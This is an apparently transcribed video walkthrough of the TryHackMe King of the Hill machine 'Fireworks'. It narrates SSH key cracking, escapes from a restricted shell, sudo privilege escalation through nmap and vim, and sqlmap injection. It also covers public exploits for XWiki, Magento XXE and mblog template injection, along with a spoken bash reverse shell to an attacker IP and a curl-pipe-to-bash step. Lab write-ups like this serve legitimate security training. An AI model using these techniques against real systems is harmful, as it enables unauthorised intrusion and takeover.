What's up everybody, this is Hoodie. Today we're looking at TryHackMe's new King of the Hill machine, Fireworks. I was super excited to do this box because it seems like it's much similar to Hogwarts machine. Shout out to my friend Holmes for making that. So each time you are in Fireworks, either the way you escalate to root will be different, or there might be different web service running on, and you have to gain that initial foothold a different way than previous one. So I've spun up two boxes of KoTH and we're gonna look at all the three variations one by one. So I'll take the IP and I'll close these out. Sorry for my excuse. And I'll go into my tmux. We have, oh my god, we have fireworks directory, and I'm gonna scan this IP using threaded 3000. There we go. We got FTP right ahead. We can log in using anonymous, I think. Yes, and we got three files. So let's get all of them. Employees.txt and a private SSH key for a user and a memo.txt. So there we go. We can close that out. What's employees.txt? So these look like potential usernames on the box, and IDRS says a private SSH key, and memo.txt just says that SSH key is encrypted with a password. So we need to crack it, and there is our first flag. There we go. So we can go ahead and crack that password using SSH to John, basically John the Reaper. I have already cracked it, so I can just view it. Sorry, I need to specify for John here, and there we go. So the password is trust no one. So the first way is you can go ahead and check manually which one of the usernames IDRSA it is. So make sure you check in lower cases because usually SSH usernames are in lowercase, and just basic, And when I go through all the usernames, I found out that it was of David user. So we can go ahead and log in using David, and we didn't give perms to IDRSA. There we go. Now we can log in, and the password was trust no one, and there we go. We are logged in as David, and we are in a shell called fire shell. So there are a couple of ways to escape it, but few other times it would be different. There might be a notepad instead of notes. Then you can use shell to run the commands like shell id, but now it's disabled for security reasons. But if you run notes, you'll see you are inside nano, and you can go ahead on GTFO bins to know about nano escapes. So there we go. We can press Ctrl R, Ctrl X and enter this command to get out of nano. Ctrl R, Ctrl X. So we can run command here. We're gonna run reset bash, and we're gonna, I think that's right. Oh, sorry, it's the error run. There we go. So we're gonna redirect output to the input and all the errors to the input. That's what I'm guessing. And if we enter, there we go. We are out of Fireshell, and we can again do reset to get a better look. So there we go. And if we check which Fireshell, oh god, I can't type. Sorry. So there we go. We got user bin Fireshell. We can check its source code. It's in Python. And you see two nodes. We are entered into nodes using nano, and I think we can even get out using where is it? Do get oh, the scrolling is not right on this box. Never mind. But we are in David now. We can do sudo -l, and we can run nmap without sudo password. So again, we can go to GTFO bins, just basic stuff, and we can run these commands to get root, but make sure that you run nmap with sudo, and there we go. We are root on this box. We can go ahead and click on reset and bash -i to get into interactive shell, and we can become king, right? We can go ahead and make it immutable so nobody can enter their name. That's just basic. So that was the first way that you can get onto the box. And now we can, oh, we didn't even finish our nmap, but never mind. We can go ahead and check what's on port 80, right? There we go. So it looks like it is music gallery website. We got admin panel. We got several other options around here. So I just went ahead and searched for, let me make it bigger, but web. This is a directory. Oh, it was cause of, let me specify the full URL. Okay, now it should be good. And there we go. So we got something, music gallery site. We can go ahead and use search exploit to search for it if there are any existing exploits, and we found broken access control and 3 SQL injections. So I'll go to the web and I search for exploit GitHub. There we go. And it's the second link I think I clicked, and it got all the POCs for all 4 type of, right? So broken access control doesn't seem to be working for me, but I'm pretty sure SQL injection is working, and sometimes it's this one or either the first one or maybe the third one. So this time I go ahead and try the third one. It's just different endpoints. So we don't have PHP music up here. We have directly classes. So you can go ahead and check this out. Classes master.php, and we can copy it till here. If we go ahead and check this, there we go. We got a endpoint. We can go ahead and turn on burp suite, make a request and capture it, save it in a file, save item, sql.txt. I've already done that for you guys, so let's go ahead and check if we got SQL injection up here. So SQL map -r to specify a request file, sql.txt. We can do check for databases, right? And we can run it faster using threads. There we go. And I've okay, so yes, we wanna use the asterisk because it just makes the process automatic and much efficient using SQL map. And there we go. We got SQL injection. It even gave us the payload. So I think this database is the right one. So we are gonna go ahead and dump this database, and we're gonna check tables. We can use batch, so it won't ask us for our input each time. And there we go. We got a users table. We can specify it and dump it right away. And here I think we will find the username and password for admin panel, and there we go. We got admin user, it's just wrong field, and we got its MD5 hash, I think, and we can go ahead and crack it using crack station. I'm not a robot. I hate this type of captchas, bro. Crack hash, and we got its password. It's MD5 at area 51. We can login using admin and at area 51. There we go. We are in the admin panel. So that was it. And we can go ahead and user list. So there are all these users. So I guessed it from here. Either it would be Steven, David, or Thomas. One another thing, if you look at the URL, there is an LFI here, so we can directly specify at etc password, and there we go. So you can look out for user bin PowerShell source code from here too. So that was the thing. That was initial access. The other way here is, and this site is similar to, like, doesn't matter what, like, what changes in the fireworks machine. This access will always remain the same, so you can exploit it every time you are in a fireworks code machine. Another one, I guess it's port 8080. We got, there we go, and it didn't tell us what's running on here. That's odd. Never mind, we can use nmap as we see. TechD4 port 8080, and we can directly go ahead and check what is on port 8080. We can go ahead and close these. So now you got it. Music gallery site is always gonna be the same. The thing that is gonna change, either it would be Fireshell Escape or it would be what's running on port 8080. So right now in this machine we got XWiki. So, and if you scroll below, we got the version of XWiki. So we can go ahead and search for its exploit, right? And there you got so many things, but I just went on to its GitHub, XWiki GitHub. There we go. And I think it was XWiki platform, from what I'm guessing. We got to security, and I think it's just from the second one, or maybe the third one. Yeah, it was the third one that I went on. It's just the same, the remote code execution vulnerability, right? And it even gave us a POC thing, like to reproduce what it's like doing. So we can go ahead and copy the URL here, bin get, and we see we already got the bin. So we can go ahead and copy and paste it. There we go. And I think it will work. There we go. It worked. So we can go ahead and save it in our directory, database search. It's a file. And if we go cat that out, you see here hello from search txt. And if we go back to the GitHub, if the title of the RSS channel contains hello from search txt42, the instance is vulnerable. So we see exactly the same. So we are sure it is vulnerable, right? So we can search for its exploit. POC script right away. And one thing I noticed while looking at the Firefox, but hold on, let me go back. So there we go, we got HexWiki right from nmap. So the thing about this box here, let me close this one. If we go back to on the main box and you check docker ps, so it's actually running inside a Docker container, right? So after remote code execution, it will give us the access to Docker container, and we can go ahead and directly even have a bash shell inside Docker container, and we are inside user local tomcat, right? And when you go ahead and log in into XWiki, I think we have the admin123. Yes, that was the login detail, so it doesn't matter though. But another thing, so if you I can only run two King of the Hill machines at the same time, so but I didn't get the mblog web service on port 8080 in any of them, but I'm gonna go ahead and show it to you guys. So there is also mtons mblog service running on port 8080 in one of the Fireworks instance, and when I search for this mtons mblog, and there we go. So uh, we got here, but if you search for exploit, there we go, the first link we got, right? The first link, it's vicarious something website, and I don't know if you're gonna believe it, but every exploit on port 8080 is taken from this website. So we can just go ahead and remove the last link and go to vsociety/posts. There we go. And if we search here xwiki, like every exploit, working exploit, you will find here, and you will even find, there we go, command injection vulnerability, authentication bypass. Hold up, xwiki. There we go. I already got the link in my, hold up, xwiki exploit. Yep, there we go. So this was the article. It's the same CVE we have on the GitHub. If you go back to xwiki GitHub and security overview, remote code execution in database search, if you check at the CVE 2024 31982, 31982 is the same thing, and it gave us a Python exploit that's working. We can go ahead and copy that, and go on our main machine, vi xvkey rce.py, save it, run it. What does it need? It just need the URL. We can specify that. Let me just go ahead and copy the xvkey URL. It's this, and we can just specify the command. Let's do id. So no text found in the response. That's weird. Where did we mess up? That's you. Who am I? Oh, I don't know why it wasn't working, and it seemed to be working now. There we go. So we can actually get a shell back from here using, I don't know why my bash reverse shell didn't work. So we can just go ahead and create a reverse shell script, vol.sh, the shebang line, and we can do bin bash -c, bin bash -i, dev tcp 10.8.47.242 on port 1337 because we are lead, and save it. Give it executable permissions, not necessary, but we're gonna do it. We're gonna start a Python server, and we're gonna start our netcat listener on port 1337. There we go. Now we can check if there is curl. There is curl, so now we can just go ahead and curl this file from our directory and directly pipe it into bash. Oh, so it still didn't give us the shell. We can go ahead and save it into a file called vol.sh. There we go. We can do ls-l. Oh. So we see our file there. We can give it, we can just directly execute it, vol.sh. Let's see if we get, oh, there we go. So we are in this exact Docker container that we are above, and if we see we have Python 3, so we can go ahead and stabilize our shell, import pty.spawn, bin bash. So this was the other way into the box. Export term is equal to xterm, backgrounded std_row echo. And if we go ahead and move to the root directory, there is another flag and another IDRSA. So we can go ahead and copy this IDRSA. Why can't I copy? Oh, there we go. And move back to our machine. Make it bigger. Hold up. There we go. We can go ahead and copy IDRSA1. There we go. Give it permission 1. And if you knew, how do I tell you? Go ahead on the main box again and port 8080. I think we are already admin, so we can go ahead and check the users. Sorry for the background noise. So we have David, we got Steven and Thomas left, so we can go ahead and log in using Thomas. I guess it was Thomas RSA, and I think we have, there we go. IDRSA error in libcrypto. What do you mean? Did I not copy it correctly? There you go. Think it's done. VI Thomas RSA, chmod 600 Thomas RSA, SSHI Thomas RSA, Thomas, and we can go ahead and put the IP here. There we go. So we are into Thomas. I think I pasted it wrong. We got another flag here, and we can just go ahead and check for sudo permissions. This time we got permissions on vim and etc host file, so we can go ahead and get into vim. If we press colon exclamation mark slash bin bash, you will see we will be out of vim. We can, I guess we can even do this using -c in vim bin bash. uh c bin bash. How did we used to do it? I don't remember, but let's just try. Nope. I think we even got GTFO bins for the same. C colon bin sh. I was doing the right thing. Bin sh. Do we need to specify the full path? User bin vim. No, it's not working like that. I think it has specified the full command, that's why we can't use. I don't know, but we can escape it by entering into vim, So that's no worries. Colon bin bash. There we go. We are root again. So these are the two ways I found into the box, and this one was in the case of XWiki, but other time I think we have this another box. It's time is still remaining, so we can go ahead and check it out. So it don't have port 80 open, but instead it has port 8443. So we can go ahead and do nmap real quick. There we go. We can check on port 8443 and the IP is different this time. There we go. So let's close this. Get out of Thomas so we can do our work here. So that's how we got out of Docker and get root. So we can exit it, reset our terminal. There we go. We can close this one out. So I think we can even do, sometimes we can even escape using this, but it's not working right now, so never mind. And in this IP, if we go ahead and IDRSA David, let's see, trust no one. This is a different box, so let's see what we got in FireShell. Do we have the same thing? We have the same thing, knots, but sometimes it's notepad and not knots, and you can't use that. In that case, you have to use shell, which we can run like basically shell commands, like shell id, shell, and get a bash shell using this, right? So that's how you can escape that time. And we got our results back. So here we have an Apache server, and I think we have a virtual host. There we go. We have magneto-dev.thm. So we can go ahead and add it to our etc host file. And we have to do this quick because the time is running out. Magento, sorry, not Magneto, magento-dev.thm. And if we go ahead and I think it's in HTTPS, it will automatically be redirected to Magento. So again, I'll tell you to look here and you will find exactly. So there we go, Magento, and it's Magento 2, but to be precise with the version, I'm not sure where to look at here. What web Magento dev.thm 8081. So there we go. If you search for Magento, you will find the exact exploit. There we go. It has XXE and Adobe Commerce and Magento. There we go. And even if you look for I think it was Rapid 7 Magento. There we go. And 7, I think, yeah, there we go. In the issues, we found an XXC vulnerability exists in the Adobe Commerce, aka Magento, but it's still not on, I think, what do you say, Metasploit still not available. So, but we have a working POC script. We can go ahead and copy that script. It's a Python script, and there we go. Where is Magento? Where is Magento? There we go. We got Magento from here too. And we can go ahead and xxe magento.py. Oh my god, I didn't copy this. Copied. So if we run this, it just need URL http magento tab.thm 8081 IP. I think it needs our box IP and port 1337. Let's run it. And there we go. By default, it will look for at etc password file, and it's again the Docker container, right? So wait, let me be sure again. We can specify the file path using -r. Let's change the port number. I just seem to get an error using this. Now what we can check, etc sudoers file, maybe cannot read the target file. Why is that? Again, I think we have, if you look at the article and go below, it just goes through the explanation of how the exploit is working, and I think it will even lead to like RCE probably further using, I think, buffer overflow in PHP library sort of, and but I didn't go that further because it was just too stressing for me. But where is it? If I move into, and the RSA files remain the same, so you don't exactly have to, you know, solve the box again and again. These doesn't changes. Even the password to admin panel we found on the port 80 is the same. And if we go ahead and log in using Thomas user, we can, using the RSA we found in previous game, and this is exactly the same. I just want to showcase you one thing. If you get logged out of the first way, exactly, right? So if the user even changes SSH keys, just it's just another way. So, and again we're gonna check docker ps, and there we go, we got Magento running. And if we go ahead and get into its docker container, bash, there we go. And if we move to, I think it's bitnami Magento, there we go. And in it, let's just search for file name id rsa, because if you look closely on the home page, there you see Thomas SSH key. We can, it's an e-commerce like, and Magento is an e-commerce platform, so that made sense. So if you just look for IDRSA, you can probably find its path. There we go, we got its path, and we can just cat that out. We need to put a dot here. There we go, we found the Thomas RSA file that was stored on the server, and we can get it using this XXE probably. And that was the room, guys. Basically, I hope you actually learned something. Like, just look for exploits, and like, Google is your best friend. And I think this is the website, vsociety serious.io/vsociety/posts. Every time a different web service, just look here and you will find the first one exploit is working. And I think I still have time left here. And there we go. We spun up another box of TryHackMe King of the Hill fireworks, and we actually got mblog, mtons mblog. This was the blog website, and on port 80 you can see it's again the music gallery side. It always remained the same. we can log in using admin at area 51. It's the same password each time, admin a capital area 51. No, I typed it wrong. It's not wrong. There we go. Okay, so let's look at mtons and let's check the source code. There we got its version, mtons mblog 3.5.0. So I just googled mtons mblog and we landed on this gitty, sort of just similar like GitHub, and it actually has, if we translate it to English, I hate it, and go ahead to login. Again, translate it to English, it's just account and password. And on the Gitty, if we look at the readme.md file, there we go. We got default administrator account passwords, admin12345. And we can go ahead and log in using this, admin12345. And we are admin. There we go. So again, I told you, mtons mblog 3.5.0 exploit, and we got the first link SSDI in mblog 3.5.1, and again the same website. If we go below, we got a Python script here. We can go ahead and copy that. I'm not sure if I got it. No, I don't have it. vi mblog ssdi.py. There we go. And let's move back to mblog ssdi. It needs URL, it needs username and password that we have, and it needs a theme template path. So let's go ahead and see how this exploit works. So it actually, I think we can go ahead and check the URL here. Admin theme upload. So let's check this. We don't need this kitty. White label error page admin theme index, I think it was. Yep, there we go. So actually it was this. Bro, it's still not in English. What do you mean? Oh, there we go. We have upload theme, right? So it was this. So it turned out we can actually upload a malicious theme like in FTL and get a reverse shell, and it's still running in as you expected Docker. So we can go ahead and log in using Thomas again on the same box. As you know, RSA and passwords doesn't change on this box. And just like Hogwarts, in Hogwarts it's different. We can get root using vim, bin bash, docker ps. We can go ahead and log in into its Docker instance, bash. There we go. We are in app blog, and what did I wanted to show you guys? Oh, my bad, it isn't this. I wanted to show you guys the fire shell one. So this time we actually have notepad and it doesn't seem to be working, right? So this time we can use shell and we can get a reverse shell of bash and get out of here, and then vp and bash dash c bash dash I dev tcp. You can use it, use revshells.com if you don't remember the exact command. And there we go. We are out of bash. Oh, fire shell. Script qc bin bash dev null, and we actually got into that. So we can use Python, I guess. I don't know what I did wrong here. There, I think I specified dev null after, or I don't know. There we go. And we can get root using nmap, I guess. There we go. And we can actually go ahead and close this one and exit. We can check etc sudoers. So I haven't still find how to get Steven access because I don't know, there is no other way. And we can get a root using Steven from wget, and it also has a GTFO bins page. So let's go ahead without wasting time and exploit this SSDI. So for this, we actually need to have these files, and if we go back to Gitty, if we go to source, let's just clone this repo, and I already have done this. So I think there we go, mblog. We can go ahead in source and their main and in resources, and we have templates. So we can directly reversely copy this directory defaults, and let me go back to fireworks. It's too hard to remember the path. So copy in recursive mode, mblog, source, main, resources, templates, default here. And we want to copy it into Voldemort. Let's go. So we can go ahead and go into Voldemort. We have our index.ftl file. And if we go back to the blog post, our FTL file should look like this. And we need to add some lines over it. But if I go ahead and remove this and vsociety posts and search for mblog, there we go. I think it also has another URL on the website that has, there we go. I think it was this one. And in this one, it actually gives this long explanation of how this exploit works and actually give us commands to just copy paste and directly. We can even manually upload this, so but we're going to do it using Python script. And there we go. Where are the commands? Where are the commands? Where are the commands? So this is the command we need to add so that our index.ftl file will look like this. It's just showing how, there we go. These are the commands we need to add, but I think we also don't have these two commands, but I don't think it will make an issue, but let's just add it for fuck's sake. And I think it's include default inc layout.ftl, and I know I can copy paste it probably. And my cat is literally on my knees right now. Disturb me for, sorry for that. And we can go ahead and change this URL to get our scripts. 10.8.47.242, and I think that it's fine. Now we need to create a zip file here. We can call it vol.zip. There we go. And we can go back and change our vol.sh to revshell.sh, the one we have in script. Spin up the web server. Let's wait for our shell back, and we can specify the template. Firstly, we need to specify the URL. There we go. And username admin, password was 12345, the default, and theme template path. What was that? Voldemort vol.zip. There we go. And let's see. I pressed enter and things should work just fine. Check your netcat listener for the reverse shell. We don't have the reverse shell, bro. And let me check. Go ahead, head, Voldemort, index.ftl, revshell.sh, revshell.sh. It should work fine. Where did we mess up? I've actually done this before, so maybe let's go ahead and check what's the difference in these files. KoTH, fireworks, Voldemort, hood index.ftl, and just grab head. Why do I have three these? Utility.execute and wget and 8 revshell.sh. Everything looks exactly the same, but we actually have, let's just copy and paste this and change, yep, and change these 4 lines just to see if it actually gonna work. There we go. Now if we run the above command again, the plugins does not seem to be vulnerable. No, you just didn't set the same shit over again. We actually uploaded our, but it didn't seem to make a request. Why would you say it's not vulnerable? What do you mean? So there we go. We finally have another mblog instance running, and I could actually reset the box to just, change what's running on port 8080 or, Magento thing. I was previously using like 2 KoTH matches to do the same thing, and I was just dumb. So there we go. So here is why our previous exploit wasn't working, because we actually had a space up here. You can go ahead in the video and check that. I'll even edit the video for that so you can see it clearly. That's why we were just getting a request for revshell.sh, but we wouldn't get a shell back. And second of all, in our first way, when we took these 2 commands from this article, it wasn't working because here is the value and not the ex, to execute the shell command. It's just how the syntax looks like. So we had value up there, that's why it wasn't even, uploading a shell on the machine. So this is what I found after troubleshooting. So now this time we're gonna do it manually. So we can just go ahead on amplog and log in using admin. We have our, so I saved the new file. We can go ahead and index.ftl. We can go ahead and remove the space. There we go. Now let's make the zip file again. vol.zip asterisk. There we go. We can use the Python script too. It will just give it the shell back, and or we can just do it manually. You already know how to do the Python script. I'll show you how to upload the script manually. Go to /admin/theme/index, and here is the green button that you can use to upload a theme template. Go away, bro. There we go. And hoodie code, fireworks, Voldemort, Hoodam, and there we go. There is a zip file, and we can translate it to English. Successful operation. Save. We can activate a template, and it again says successful operation. Now we can just go ahead and trigger by going, because it's index.ftl, so it's the main page. And if we make a request here, we see, and we got our shell back in the Docker container. We can go ahead and root, and we can get this IDRSA for Thomas user and route it this way. So this was the box, guys, and I hope you really learned something new. We can actually go ahead in Docker and see, here is our revshell directly in the Docker container. So that's how we got in. That's all the ways I could potentially find in this machine. So I'll see you till next time. Leave comments down below. What did I miss? See ya.